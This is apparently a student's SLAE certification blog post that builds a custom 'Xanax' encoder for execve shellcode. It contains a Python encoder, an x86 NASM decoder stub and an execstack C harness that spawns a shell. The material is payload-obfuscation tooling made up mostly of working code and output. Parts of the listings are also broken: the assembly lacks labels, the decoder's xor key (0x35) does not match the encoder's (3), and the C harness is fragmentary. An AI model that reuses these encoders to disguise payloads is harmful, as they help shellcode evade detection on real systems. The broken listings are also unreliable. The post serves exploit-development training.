• Create a custom encoding scheme like the “Insertion Encoder” we showed you
  • PoC with using execve-­‐stack as the shellcode to encode with your schema and execute


So for our 4th assignment we need to create a custom encoder then decoder stub in assembly to decrypt the encoded payload and execute our shell code. For this I will be using a XANAX encoding scheme.

  • Xor
  • add
  • not
  • add
  • xor 

First we will write an encoder in python followed by the decoder in assembly.


# Python Xanax Encoder 
# SLAE Assignment 4

# Execve Shellcode 
shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
encoded = ""
encoded2 = ""

# Variables
xor1 = 0xaa
add1 = 0x01
add2 = 0x08 
xor2 = 3

print('Encoded shellcode ...')

for x in bytearray(shellcode):
    # XOR 
    x = x^xor1
    # Add 
    x = x + add1 
    # Not 
    x = ~x 
    x = x & 0xff # Convert to positive 
    # Add2 
    x = x + add2 
    # XOR2 
    x = x^xor2
    encoded += '\\x'
    encoded += '%02x' %x
    encoded2 += '0x'
    encoded2 += '%02x,' %x 

print('Len: %d' % len(bytearray(shellcode)))

The one small gotcha within the code was the not function which creates a negative value, hence the the additional line to ensure a positive result here. Now we have our encoded shellcode we move on to creating a decoder stub in assembly to decrypt and run the code after running our python encoder to get our encoded shellcode.

suls@ubuntu:~/myslae/SLAE/Assignment-4$ python 
Encoded shellcode ...
Len: 25


; Filename: xanax-decoder.nasm
; Website:
; Purpose: xanx decoder stub in assembly

global _start			

section .text
    jmp short call_shellcode

	pop esi ; pop shellcode address to esi 
	xor ecx, ecx ; Clear ecx 
	mov cl, 25 ; store counter of number of bytes
    ; Xanax Decoder (NB:reverse order of our python encoder)
	xor byte [esi], 0x35
    sub byte [esi], 0x08
    not byte [esi]
    sub byte [esi], 0x01
	xor byte [esi], 0xaa
    ; Increment counter 
    inc esi
    ;loop if not done  
	loop decode 
    ; Otherwise call our decoded shellcode 
	jmp short EncodedShellcode


	call decoder
	EncodedShellcode: db 0x5e,0xa9,0x39,0x71,0xb4,0xb4,0x18,0x71,0x71,0xb4,0x0b,0x76,0x77,0xd6,0x88,0x39,0xd6,0x8b,0x38,0xd6,0x8e,0xd9,0x50,0xaa,0xe9

The assembly is pretty straight forward, we used a jump call pop to retrieve the location of our shellcode then a simple loop to run the decoding function. The only small and obvious issue I ran into here was that you need to subtract rather than add the two values we added in our encoding routine. We then assemble and link the assembly code.

suls@ubuntu:~/myslae/SLAE/Assignment-4$ ./ xanax-decoder
[+] Assembling with Nasm ... 
[+] Linking ...
[+] Done!

Extract the shellcode for the decoder stub and our encoded shellcode:

suls@ubuntu:~/myslae/SLAE/Assignment-4$ objdump -d ./xanax-decoder|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g' 

Create a test program in C:


unsigned char code[] = \

	printf("Shellcode Length:  %d\n", strlen(code));
	int (*ret)() = (int(*)())code;

Compile and run the code to prove our decoder stub correctly decodes our encoded shellcode and executes the decoded execve-­‐stack shellcode.

suls@ubuntu:~/myslae/SLAE/Assignment-4$ gcc -fno-stack-protector -z execstack -oxanax-decoder-test xanax-decoder-test.c 
xanax-decoder-test.c:8:1: warning: return type defaults to ‘int’ [-Wimplicit-int]
suls@ubuntu:~/myslae/SLAE/Assignment-4$ ./xanax-decoder-test Shellcode Length:  56
$ id
uid=1000(suls) gid=1000(suls) groups=1000(suls),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$ exit

This completes assignment four, source code is available on GitHub

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
Student ID: SLAE-1436

Leave a Reply